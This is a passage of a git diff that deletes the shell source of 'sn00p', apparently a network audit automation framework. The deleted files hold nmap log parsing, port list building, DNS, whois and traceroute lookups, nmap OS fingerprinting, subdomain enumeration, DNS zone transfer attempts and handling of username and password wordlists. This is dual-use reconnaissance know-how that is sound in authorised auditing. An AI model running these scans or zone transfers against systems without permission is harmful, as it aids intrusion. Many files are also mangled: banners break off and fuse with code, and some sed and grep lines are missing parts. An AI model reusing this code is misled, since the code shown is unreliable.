${@} 2>&1" | echo " `cut -d " " -f 8-`" >> ${modfile} - echo "" >> ${modfile} - echo ' return ${SUCCESS}' >> ${modfile} - echo "}" >> ${modfile} - msg "\n\n# go go go\nrun_audits\n\n# EOF" >> ${modfile} - - msg "[*] created module ${2}" - - exit ${SUCCESS} - - return ${SUCCESS} -} - - -# exclude given modules -exclude_module() -{ - ex_host_mods=`echo ${ex_modules} | - awk '{for (i=1; i<=NF; i++) {split($i, a, /host_/); print a[2];}}'` - - ex_tcp_mods=`echo ${ex_modules} | - awk '{for 
(i=1; i<=NF; i++) {split($i, a, /tcp_[^0-9]*/); print a[2];}}'`
-
- ex_udp_mods=`echo ${ex_modules} |
- awk '{for (i=1; i<=NF; i++) {split($i, a, /udp_[^0-9]*/); print a[2];}}'`
-
- ex_web_mods=`echo ${ex_modules} |
- awk '{for (i=1; i<=NF; i++) {split($i, a, /web_/); print a[2];}}'`
-
- ex_lan_mods=`echo ${ex_modules} |
- awk '{for (i=1; i<=NF; i++) {split($i, a, /lan_/); print a[2];}}'`
-
- ex_wlan_mods=`echo ${ex_modules} |
- awk '{for (i=1; i<=NF; i++) {split($i, a, /wlan_/); print a[2];}}'`
-
- if [ -z "${ex_host_mods}" ]
- then
- ex_host_mods="NONE"
- fi
- if [ -z "${ex_tcp_mods}" ]
- then
- ex_tcp_mods="NONE"
- fi
- if [ -z "${ex_udp_mods}" ]
- then
- ex_udp_mods="NONE"
- fi
- if [ -z "${ex_web_mods}" ]
- then
- ex_web_mods="NONE"
- fi
- if [ -z "${ex_lan_mods}" ]
- then
- ex_lan_mods="NONE"
- fi
- if [ -z "${ex_wlan_mods}" ]
- then
- ex_wlan_mods="NONE"
- fi
-
- return ${SUCCESS}
-}
-
-
-# include given modules
-# keeping awk code simple (combine with tr), cause too much different
-# versions...mawk, gawk, awk...FUCK!
-include_module()
-{
- in_host_mods=`echo ${in_modules} | tr -s ' ' '\n' | tr -s '_' ' ' |
- awk '$1=="host" {print $2;}'`
-
- in_tcp_mods=`echo ${in_modules} | tr -s ' ' '\n' | tr -s '_' ' ' |
- awk '$1=="tcp" {print $2;}'`
-
- in_udp_mods=`echo ${in_modules} | tr -s ' ' '\n' | tr -s '_' ' ' |
- awk '$1=="udp" {print $2;}'`
-
- in_web_mods=`echo ${in_modules} | tr -s ' ' '\n' | tr -s '_' ' ' |
- awk '$1=="web" {print $2;}'`
-
- in_lan_mods=`echo ${in_modules} | tr -s ' ' '\n' | tr -s '_' ' ' |
- awk '$1=="lan" {print $2;}'`
-
- in_wlan_mods=`echo ${in_modules} | tr -s ' ' '\n' | tr -s '_' ' ' |
- awk '$1=="wlan" {print $2;}'`
-
- if [ -z "${in_host_mods}" ]
- then
- in_host_mods="NONE"
- fi
- if [ -z "${in_tcp_mods}" ]
- then
- in_tcp_mods="NONE"
- fi
- if [ -z "${in_udp_mods}" ]
- then
- in_udp_mods="NONE"
- fi
- if [ -z "${in_web_mods}" ]
- then
- in_web_mods="NONE"
- fi
- if [ -z "${in_lan_mods}" ]
- then
- in_lan_mods="NONE"
- fi
- if [ -z "${in_wlan_mods}" ]
- then
- in_wlan_mods="NONE"
- fi
-
- return ${SUCCESS}
-}
-
-# EOF
diff --git a/automation/sn00p/source/src/core/parse.sh b/automation/sn00p/source/src/core/parse.sh
deleted file mode 100644
index 9e94ab0..0000000
--- a/automation/sn00p/source/src/core/parse.sh
+++ /dev/null
@@ -1,240 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_- ${VERBOSE} 2>&1 - - if [ ${usexml} ] - then - protocol="`grep "scaninfo" ${logfile} | cut -d '"' -f 4`" - else - cnt=`grep "/open/tcp/" ${logfile} | wc -l` - if [ ${cnt} -gt 0 ] - then - protocol="tcp" - else - protocol="udp" - fi - fi - - return ${SUCCESS} -} - - -# parse open ports from nmap grepable-logfile -parse_nmap_grepable_ports() -{ - grep "${host}" ${logfile} | tr -s ',: ' '\n' | grep '/' | - ${_sed}'s/\/open.*//g;/filtered|closed|\(|\)|\//d' \ - >> "${host}/${portlist}" - - return ${SUCCESS} -} - - -# parse open ports from nmap xml-logfile -parse_nmap_xml_ports() -{ - # cut relevant xml part to tempfile - ${_sed} "/
/wtmp_${host}" \
- ${logfile} > ${VERBOSE} 2>&1
-
- # get ports from tempfile and write to new file
- awk '/state="open/ {print $3}' "tmp_${host}" |
- tr -d '"><=a-z ' >> "${host}/${portlist}"
-
- return ${SUCCESS}
-}
-
-
-# parse ports from nmap logfiles
-parse_nmap_ports()
-{
- msg "[*] parsing nmap ports" > ${VERBOSE} 2>&1
-
- if [ ${usexml} ]
- then
- parse_nmap_xml_ports
- else
- parse_nmap_grepable_ports
- fi
-
- return ${SUCCESS}
-}
-
-
-# parse hosts from nmap grepable-logfile
-parse_nmap_grepable_hosts()
-{
- hosts=`awk '/^Host:/ {print $2}' ${logfile} | uniq`
-
- return ${SUCCESS}
-}
-
-
-# parse hosts from nmap xml-logfile
-parse_nmap_xml_hosts()
-{
- hosts="`grep "
 ${VERBOSE} 2>&1
-
- if [ ${usexml} ]
- then
- parse_nmap_xml_hosts
- else
- parse_nmap_grepable_hosts
- fi
-
- return ${SUCCESS}
-}
-
-
-# parse ports from table list
-parse_target_ports()
-{
- msg "[*] parsing target ports" > ${VERBOSE} 2>&1
-
- awk '{print $3}' ${table_list} | tr -s ',' '\n' > ${host}/${portlist}
-
- return ${SUCCESS}
-}
-
-
-# parse network interfaces from list
-parse_net_ifs()
-{
- netifs="`cut -d ' ' -f 2 ${table_list}`"
-
- return ${SUCCESS}
-}
-
-
-# parse hosts and ports from host list
-parse_target_hosts()
-{
- msg "[*] parsing target hosts" > ${VERBOSE} 2>&1
-
- hosts="`cut -d ' ' -f 2 ${table_list} | tr -d '/'`"
-
- return ${SUCCESS}
-}
-
-
-# parse protocol value from table list
-parse_target_protocol()
-{
- msg "[*] parsing target protocol" > ${VERBOSE} 2>&1
-
- protocol="`grep "${host}" ${table_list} | cut -d ' ' -f 1 | tr -d '\n'`"
-
- return ${SUCCESS}
-}
-
-
-# parse mode options
-parse_mode_opts()
-{
- shost="`echo ${mode_opts} | tr -s ';' '\n' | grep '^shost' |
- cut -d '=' -f 2`"
- sport="`echo ${mode_opts} | tr -s ';' '\n' | grep '^sport' |
- cut -d '=' -f 2`"
- smac="`echo ${mode_opts} | tr -s ';' '\n' | grep '^smac' |
- cut -d '=' -f 2`"
- dhost="`echo ${mode_opts} | tr -s ';' '\n' | grep '^dhost' |
- cut -d '=' -f 2`"
- dport="`echo ${mode_opts} | tr -s ';' '\n' | grep '^dport' |
- cut -d '=' -f 2`"
- dmac="`echo ${mode_opts} | tr -s ';' '\n' | grep '^dmac' |
- cut -d '=' -f 2`"
- rhost="`echo ${mode_opts} | tr -s ';' '\n' | grep '^rhost' |
- cut -d '=' -f 2`"
- rport="`echo ${mode_opts} | tr -s ';' '\n' | grep '^rport' |
- cut -d '=' -f 2`"
- rmac="`echo ${mode_opts} | tr -s ';' '\n' | grep '^rmac' |
- cut -d '=' -f 2`"
- ndev="`echo ${mode_opts} | tr -s ';' '\n' | grep '^ndev' | cut -d '=' -f 2`"
- ssid="`echo ${mode_opts} | tr -s ';' '\n' | grep '^ssid' | cut -d '=' -f 2`"
- bssid="`echo ${mode_opts} | tr -s ';' '\n' | grep '^bssid' |
- cut -d '=' -f 2`"
- cookie="`echo ${mode_opts} | tr -s ';' '\n' | grep '^cookie' |
-
 cut -d '=' -f 2`"
- user="`echo ${mode_opts} | tr -s ';' '\n' | grep '^user' | cut -d '=' -f 2`"
- pass="`echo ${mode_opts} | tr -s ';' '\n' | grep '^pass' | cut -d '=' -f 2`"
- ulists="`echo ${mode_opts} | tr -s ';' '\n' | grep '^ulists' |
- cut -d '=' -f 2 | tr -s ',' ' '`"
- plists="`echo ${mode_opts} | tr -s ';' '\n' | grep '^plists' |
- cut -d '=' -f 2 | tr -s ',' ' '`"
-
- return ${SUCCESS}
-}
-
-
-# parsing options from sn00p config file
-parse_conf()
-{
- msg "[*] parsing sn00p.conf" > ${VERBOSE} 2>&1
-
- if [ -f "${SN00P_PATH}/sn00p.conf" ]
- then
- ndev=`grep "^NETDEV=" ${SN00P_PATH}/sn00p.conf | cut -d '=' -f 2 |
- tr -d '"' | tr -s ',' ' '`
- in_modules=`grep "^IN_MODULES=" ${SN00P_PATH}/sn00p.conf |
- cut -d '=' -f 2 | tr -d '"' | tr -s ',' ' '`
- in_tools=`grep "^IN_TOOLS=" ${SN00P_PATH}/sn00p.conf | cut -d '=' -f 2 |
- tr -d '"' | tr -s ',' ' '`
- ex_modules=`grep "^EX_MODULES=" ${SN00P_PATH}/sn00p.conf |
- cut -d '=' -f 2 | tr -d '"' | tr -s ',' ' '`
- ex_tools=`grep "^EX_TOOLS=" ${SN00P_PATH}/sn00p.conf | cut -d '"' -f 2 |
- tr -d '"' | tr -s ',' ' '`
- user=`grep "^USER=" ${SN00P_PATH}/sn00p.conf | cut -d '"' -f 2 |
- tr -d '"' | tr -s ',' ' '`
- pass=`grep "^PASS=" ${SN00P_PATH}/sn00p.conf | cut -d '"' -f 2 |
- tr -d '"' | tr -s ',' ' '`
- ulists=`grep "^USERLISTS=" ${SN00P_PATH}/sn00p.conf |
- cut -d '"' -f 2 | tr -d '"' | tr -s ',' ' '`
- plists=`grep "^PASSLISTS=" ${SN00P_PATH}/sn00p.conf |
- cut -d '"' -f 2 | tr -d '"' | tr -s ',' ' '`
- else
- error "can't read or find sn00p config file"
- fi
-
- return ${SUCCESS}
-}
-
-# EOF
diff --git a/automation/sn00p/source/src/core/target.sh b/automation/sn00p/source/src/core/target.sh
deleted file mode 100644
index ad8f1e9..0000000
--- a/automation/sn00p/source/src/core/target.sh
+++ /dev/null
@@ -1,155 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_- ${VERBOSE} 2>&1 - - if [ "${in_tcp_mods}" != "NONE" ] - then - echo ${in_tcp_mods} | tr -s ' ' '\n' > "${tmplist}" - fi - - if [ "${ex_tcp_mods}" != "NONE" ] - then - grep -v "`echo ${ex_tcp_mods} | tr -s ' ' '\n'`" "${host}/${portlist}" | - tee ${tmplist} > ${VERBOSE} 2>&1 - fi - - if [ "${in_udp_mods}" != "NONE" ] - then - echo ${in_udp_mods} | tr -s ' ' '\n' > "${tmplist}" - fi - - if [ "${ex_udp_mods}" != "NONE" ] - then - grep -v "`echo ${ex_udp_mods} | tr -s ' ' '\n'`" "${host}/${portlist}" \ - > "${tmplist}" > ${VERBOSE} 2>&1 - fi - - # delete lines with default and move to final portlist file - if [ -f "${tmplist}" ] - then - sed '/^default/d' < ${tmplist} > "${host}/${portlist}" - fi - - return ${SUCCESS} -} - - -# create a new portlist from nmap logfile -make_nmap_port_list() -{ - parse_nmap_protocol - portlist="${protocol}_port.lst" - parse_nmap_ports - - return ${SUCCESS} -} - - -# create a portlist from command line list -make_target_port_list() -{ - parse_target_protocol - check_protocol - portlist="${protocol}_port.lst" - parse_target_ports - - return ${SUCCESS} -} - - -# create a new port list from nmap logfile or command line list -make_port_list() -{ - msg "[*] making port list" > ${VERBOSE} 2>&1 - - for host in ${hosts} - do - if [ ${logfile} ] - then - make_nmap_port_list - else - make_target_port_list - fi - - filter_port_list - done - - return ${SUCCESS} -} - - -# create a table of list in a temporary file, so we can parse later -# each row's entry and use it for target_list, net_list, etc. 
-make_table_list()
-{
- msg "[*] making target table list" > ${VERBOSE} 2>&1
-
- list="${1}"
- table_list="table.lst"
-
- echo ${list} | awk -F ';' '{for (i=1; i<=NF; i++)
- {split($i, a, /:\/*/); print a[1] " " a[2] " " a[3]}}' > ${table_list}
-
- return ${SUCCESS}
-}
-
-
-# create network interface directories
-make_net_dirs()
-{
- for netif in ${netifs}
- do
- mkdir ${netif} > ${VERBOSE} 2>&1
- done
-
- return ${SUCCESS}
-}
-
-
-# create host directories
-make_host_dirs()
-{
- msg "[*] making host list" > ${VERBOSE} 2>&1
-
- for host in ${hosts}
- do
- mkdir ${host} > ${VERBOSE} 2>&1
- done
-
- return ${SUCCESS}
-}
-
-# EOF
diff --git a/automation/sn00p/source/src/modules/host/default.sh b/automation/sn00p/source/src/modules/host/default.sh
deleted file mode 100644
index 569ed26..0000000
--- a/automation/sn00p/source/src/modules/host/default.sh
+++ /dev/null
@@ -1,254 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# check, if ${DHOST} is a hostname -check_hostname() -{ - # enough for testing, since ip address don't include a-z or A-Z - if echo ${DHOST} | grep "[a-zA-Z]" > ${VERBOSE} 2>&1 - then - hostname="${TRUE}" - fi - - return ${SUCCESS} -} - - -# get ipv4 address directly via ${DHOST} or via dns request for A record -# TOOLS: host -do_ipv4addr() -{ - if [ ${hostname} ] - then - host -t A ${DHOST} 2>&1 | awk '{print $(NF)}' - else - echo "${DHOST}" 2>&1 - fi - - return ${SUCCESS} -} - - -# get ipv6 address directly via ${DHOST} or via dns request for AAAA record -# TOOLS: host -do_ipv6addr() -{ - if [ ${hostname} ] - then - host -t AAAA ${DHOST} 2>&1 | awk '/IPv6 address/ {print $5}' - else - echo "${DHOST}" 2>&1 - fi - - return ${SUCCESS} -} - - -# get hostname directly via ${DHOST} or via dns request for PTR record -# TOOLS: host -do_hostname() -{ - if [ ${hostname} ] - then - echo "${DHOST}" 2>&1 - else - host -t PTR ${DHOST} 2>&1 | - awk '/pointer/ {sub(/[.]$/, ""); print $(NF)}' - fi - - return ${SUCCESS} -} - - -# get 
domainname directly via ${DHOST} or via dns request for PTR record
-# TOOLS: host
-do_domain()
-{
- domain="`echo ${DHOST} | awk -F'.' '{print $(NF)}'`"
-
- if [ ! -z "${domain}" ]
- then
- echo "${DHOST}" 2>&1
- else
- host -t PTR ${DHOST} 2>&1 |
- awk '/pointer/ {num=split($0, a, "."); print a[num-2] "." a[num-1]}'
- fi
-
- return ${SUCCESS}
-}
-
-
-# get ip address range
-# TOOLS: whois
-do_iprange()
-{
- if [ ${hostname} ]
- then
- whois `head -1 ipv4addr.log` 2>&1 |
- awk '/inetnum|NetRange/ {print $2"-"$4}' | head -1
- else
- whois ${DHOST} 2>&1 | awk '/inetnum|NetRange/ {print $2"-"$4}' |
- head -1
- fi
-
- return ${SUCCESS}
-}
-
-
-# get nameservers (ns records)
-# TOOLS: host
-do_nameserver()
-{
- host -t NS `head -1 domain.log` 2>&1 |
- awk '/name server/ {sub(/[.]$/, ""); print $(NF)}'
-
- return ${SUCCESS}
-}
-
-
-# get mailserver (mx records)
-# TOOLS: host
-do_mailserver()
-{
- if [ ${hostname} ]
- then
- # try via hostname
- host -t MX `head -1 hostname.log` 2>&1 |
- awk '/is handled/ {sub(/[.]$/, ""); print $(NF)}'
- else
- # try via ipv4 address
- host -t MX `head -1 ipv4addr.log` 2>&1 |
- awk '/is handled/ {sub(/[.]$/, ""); print $(NF)}'
- fi
-
- # try via domain
- host -t MX `head -n 1 domain.log` 2>&1 |
- awk '/is handled/ {sub(/[.]$/, ""); print $(NF)}'
-
- return ${SUCCESS}
-}
-
-
-# check for hostname/ipaddr first
-check_hostname
-
-# go go go
-run_audits
-
-# EOF
diff --git a/automation/sn00p/source/src/modules/host/fingerprint.sh b/automation/sn00p/source/src/modules/host/fingerprint.sh
deleted file mode 100644
index ed5a535..0000000
--- a/automation/sn00p/source/src/modules/host/fingerprint.sh
+++ /dev/null
@@ -1,150 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# fingerprint OS using nmap -# TOOLS: nmap -do_nmap_os() -{ - # default ports in hope that they are open and port 1 as closed port - opts="-n -sT -P0 -O --osscan-guess -p 21,22,23,25,53,80,443,110,111,113" - opts="${opts},143,993,995,443,8000,8080 --open" - - nmap ${opts} ${DHOST} 2>&1 - - return ${SUCCESS} -} - -# fingerprint OS using sinfp3 -# TOOLS: sinfp -do_sinfp() -{ - #opts="-port 21,22,23,25,53,80,110,111,113,143,993,995,443,8000,8080" - opts="${opts} -port ${DPORT} -input-ipport -retry 2 -output-console" - opts="${opts} -db-file /usr/share/sinfp3/sinfp3.db" - - sinfp -target ${DHOST} ${opts} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/host/subdomainscan.sh b/automation/sn00p/source/src/modules/host/subdomainscan.sh deleted file mode 100644 index 50f8c0f..0000000 --- a/automation/sn00p/source/src/modules/host/subdomainscan.sh +++ /dev/null 
@@ -1,181 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# globals -domain_log="../default/domain.log" - - -# scan for subdomains using dnsspider.py over udp -# TOOLS: dnsspider -do_dnsspider() -{ - opts="-t 0 -x 64" - - dnsspider ${opts} -a `head -1 ${domain_log}` 2>&1 - - return ${SUCCESS} -} - - -# scan for subdomains using ripdc.py via IP address -# TOOLS: ripdc -do_ripdc_ip() -{ - ripdc -t ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# scan for subdomains using ripdc.py via domain name -# TOOLS: ripdc -do_ripdc_domain() -{ - ripdc -t `head -1 ${domain_log}` 2>&1 - - return ${SUCCESS} -} - - -# scan for subdomains using dnsenum -# TOOLS: dnsenum -do_dnsenum() -{ - opts="--threads 16" - - dnsenum ${opts} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# scan for subdomains and (sub-)directories using spidy -# TOOLS: spidy.sh -do_spidy() -{ - spidy.sh `head -1 ${domain_log}` 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF 
diff --git a/automation/sn00p/source/src/modules/host/tracehost.sh b/automation/sn00p/source/src/modules/host/tracehost.sh deleted file mode 100644 index 96693af..0000000 --- a/automation/sn00p/source/src/modules/host/tracehost.sh +++ /dev/null @@ -1,157 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# trace the route to target using traceroute -# TOOLS: traceroute -do_traceroute() -{ - opts="-q 2 -w 3 -4" - - traceroute ${opts} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# trace the route to target using tcptraceroute -# TOOLS: tcptraceroute -do_tcptraceroute() -{ - opts="-q 2 -w 1" - - tcptraceroute ${DHOST} ${DPORT} 2>&1 - - return ${SUCCESS} -} - - -# trace the route to target using tracepath -# TOOLS: tracepath -do_tracepath() -{ - tracepath -n ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/host/whois.sh b/automation/sn00p/source/src/modules/host/whois.sh deleted file mode 100644 index efc448a..0000000 --- a/automation/sn00p/source/src/modules/host/whois.sh +++ /dev/null 
@@ -1,151 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# whois domain -# TOOLS: whois -do_whois_domain() -{ - for i in `cat ../default/domain.log 2>&1` - do - whois ${i} 2>&1 - echo "" - done - - return ${SUCCESS} -} - - -# whois ip addr -# TOOLS: whois -do_whois_ip() -{ - for i in `cat ../default/ipv4addr.log 2>&1` - do - whois ${i} 2>&1 - echo "" - done - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/host/zonetransfer.sh b/automation/sn00p/source/src/modules/host/zonetransfer.sh deleted file mode 100644 index 194e620..0000000 --- a/automation/sn00p/source/src/modules/host/zonetransfer.sh +++ /dev/null 
@@ -1,184 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# we need in most of our routines, so we make global -domain="../default/domain.log" -nameserver="../default/nameserver.log" - - -# dns zone transfer via host -# TOOLS: host -do_zonetransfer_host() -{ - for domain in `cat ${domain}` - do - for nameserver in `cat ${nameserver}` - do - host -l "${domain}" "${nameserver}" 2>&1 - done - done - - return ${SUCCESS} -} - - -# dns zone transfer via dig -# TOOLS: dig -do_zonetransfer_dig() -{ - for domain in `cat ${domain}` - do - for nameserver in `cat ${nameserver}` - do - dig axfr "@${nameserver}" "${domain}" 2>&1 - done - done - - return ${SUCCESS} -} - - -# dns zone transfer via dnswalk -# TOOLS: dnswalk -do_dnswalk() -{ - opts="-F" - - for domain in `cat ${domain}` - do - dnswalk ${opts} "${domain}." 2>&1 - done - - return ${SUCCESS} -} - -# dns zone transfer via dnsenum -# TOOLS: dnsenum -do_dnsenum() -{ - dnsenum ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF 
diff --git a/automation/sn00p/source/src/modules/lan/default.sh b/automation/sn00p/source/src/modules/lan/default.sh deleted file mode 100644 index 70b45c6..0000000 --- a/automation/sn00p/source/src/modules/lan/default.sh +++ /dev/null 
@@ -1,261 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# check if ip utils is installed -check_ip_utils() -{ - str=`ip 2> /dev/stdout | head -1 | cut -d ' ' -f 1` - - if [ "${str}" = "Usage:" ] - then - iputil="ip" - fi - - return ${SUCCESS} -} - - -# get source ip address -# TOOLS: ifconfig ip -do_srcip() -{ - if [ -z "${SHOST}" ] - then - if [ "${iputil}" = "ip" ] - then - ip a show dev ${NDEV} | awk '/inet / {print $2}' | sed 's/\/.*//g' \ - 2>&1 - else - ifconfig ${NDEV} | awk '/inet / {print $2}' 2>&1 - fi - else - echo "${SHOST}" 2>&1 - fi - - return ${SUCCESS} -} - - -# get source mac address -# TOOLS: ifconfig -do_srcmac() -{ - if [ -z "${SMAC}" ] - then - if [ "${iputil}" = "ip" ] - then - ip a show dev ${NDEV} | grep "link/ether" | awk '{print $2}' 2>&1 - else - if [ `uname` = "OpenBSD" ] - then - ifconfig ${NDEV} | awk '/lladdr / {print $2}' 2>&1 - else - ifconfig ${NDEV} | awk '/ether / {print $2}' 2>&1 - fi - fi - else - echo "${SMAC}" 2>&1 - fi - - return ${SUCCESS} -} - - -# get subnet mask -# TOOLS: ifconfig -do_subnetmask() -{ - #if [ "${iputil}" = "ip" ] - 
#then - # ip dev ${NDEV} 2>&1 - #else - #ifconfig ${NDEV} | awk '/inet / {print $4}' 2>&1 - #fi - - ifconfig ${NDEV} | awk '/inet / {print $4}' 2>&1 - - return ${SUCCESS} -} - - -# get broadcast address -# TOOLS: ifconfig -do_broadcast() -{ - if [ "${iputil}" = "ip" ] - then - ip a show dev ${NDEV} | grep '\' | awk '{print $4}' 2>&1 - else - ifconfig ${NDEV} | awk '/inet / {print $6}' 2>&1 - fi - - return ${SUCCESS} -} - - -# get ip address of router for default route -# TOOLS: netstat -do_routerip() -{ - if [ -z "${RHOST}" ] - then - if [ `uname` = "SunOS" ] - then - netstat -rn | grep "${NDEV}" | grep "default" | tr -s ' ' '-' | - cut -d '-' -f 2 - else - if [ "${iputil}" = "ip" ] - then - ip route | grep 'default' | cut -d ' ' -f 3 2>&1 - else - netstat -rn | grep "${NDEV}" | grep "^0.0.0.0" | - awk '{print $2}' 2>&1 - fi - fi - else - echo "${RHOST}" 2>&1 - fi - - return ${SUCCESS} -} - - -# get mac address of router -# TOOLS: arp -do_routermac() -{ - rhost="`head -1 routerip.log 2> /dev/null`" - - if [ -z "${RMAC}" ] - then - arp -an | grep "\<${rhost}\>" | cut -d ' ' -f 4 2>&1 - else - echo "${RMAC}" 2>&1 - fi - - return ${SUCCESS} -} - - -check_ip_utils - -# go go go -run_audits - -# EOF diff --git 